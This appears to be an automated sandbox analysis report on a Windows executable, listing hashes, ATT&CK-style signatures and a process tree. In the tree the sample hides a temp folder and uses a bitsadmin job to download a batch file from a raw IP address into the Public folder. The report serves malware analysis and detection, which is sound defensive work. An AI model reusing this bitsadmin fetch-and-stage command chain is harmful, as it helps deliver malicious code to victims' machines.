Analysis
-
max time kernel
13s -
max time network
21s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
05-08-2024 14:05
Static task
static1
Behavioral task
behavioral1
Sample
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Resource
win7-20240705-en
General
-
Target
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
-
Size
126KB
-
MD5
b2dc0f8a36a7e450b11149a8e15ca964
-
SHA1
27fd3d24a969b5b0528b69f1cbd8b293e74a6809
-
SHA256
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
-
SHA512
135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
-
SSDEEP
1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
attrib.execmd.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.execmd.execmd.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.execmd.exebitsadmin.exeab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.exebitsadmin.exebitsadmin.exebitsadmin.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2144 wrote to memory of 3060 2144 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2144 wrote to memory of 3060 2144 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2144 wrote to memory of 3060 2144 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2144 wrote to memory of 3060 2144 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 3060 wrote to memory of 2788 3060 cmd.exe attrib.exe PID 3060 wrote to memory of 2788 3060 cmd.exe attrib.exe PID 3060 wrote to memory of 2788 3060 cmd.exe attrib.exe PID 3060 wrote to memory of 2788 3060 cmd.exe attrib.exe PID 3060 wrote to memory of 2920 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2920 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2920 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2920 3060 cmd.exe cmd.exe PID 2920 wrote to memory of 2936 2920 cmd.exe bitsadmin.exe PID 2920 wrote to memory of 2936 2920 cmd.exe bitsadmin.exe PID 2920 wrote to memory of 2936 2920 cmd.exe bitsadmin.exe PID 2920 wrote to memory of 2936 2920 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2940 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2940 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2940 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2940 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2948 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2948 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2948 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2948 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2808 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2808 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2808 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2808 3060 cmd.exe cmd.exe PID 2808 wrote to memory of 2096 2808 cmd.exe bitsadmin.exe PID 2808 wrote to memory of 2096 2808 cmd.exe bitsadmin.exe PID 2808 wrote to memory of 2096 2808 cmd.exe bitsadmin.exe PID 2808 wrote to memory of 2096 2808 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2976 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2976 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2976 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2976 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 1964 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 1964 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 1964 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 1964 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2852 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2852 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2852 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2852 3060 cmd.exe cmd.exe PID 2852 wrote to memory of 2988 2852 cmd.exe bitsadmin.exe PID 2852 wrote to memory of 2988 2852 cmd.exe bitsadmin.exe PID 2852 wrote to memory of 2988 2852 cmd.exe bitsadmin.exe PID 2852 wrote to memory of 2988 2852 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2696 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2696 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2696 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2696 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 3032 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 3032 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 3032 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 3032 3060 cmd.exe bitsadmin.exe PID 3060 wrote to memory of 2688 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2688 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2688 3060 cmd.exe cmd.exe PID 3060 wrote to memory of 2688 3060 cmd.exe cmd.exe PID 2688 wrote to memory of 2800 2688 cmd.exe bitsadmin.exe PID 2688 wrote to memory of 2800 2688 cmd.exe bitsadmin.exe PID 2688 wrote to memory of 2800 2688 cmd.exe bitsadmin.exe PID 2688 wrote to memory of 2800 2688 cmd.exe bitsadmin.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t26049.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\ytmp3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2936 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2940 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /crEaTe pls3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2976 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /ResUme pls3⤵
- System Location Discovery: System Language Discovery
PID:1964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2988 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2696 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /CompLete pls3⤵
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2944 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2832
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5c63068e2c14568d2561d4350a38a6475
SHA1141406945974b7a7be1d908a035a8ccb88efa1a0
SHA2569729a6b5370e1ea53546f0a4331cbf83441eb409d1ab1393501421204dbfcbd8
SHA512fc67084b7cd7003b0375fed2931c96645fdaabc70593fbaa3f0920943d9f4454c727025b386c9866b729bbbf0c45c5708f082c08bec2cbbe38a8b157b03498d0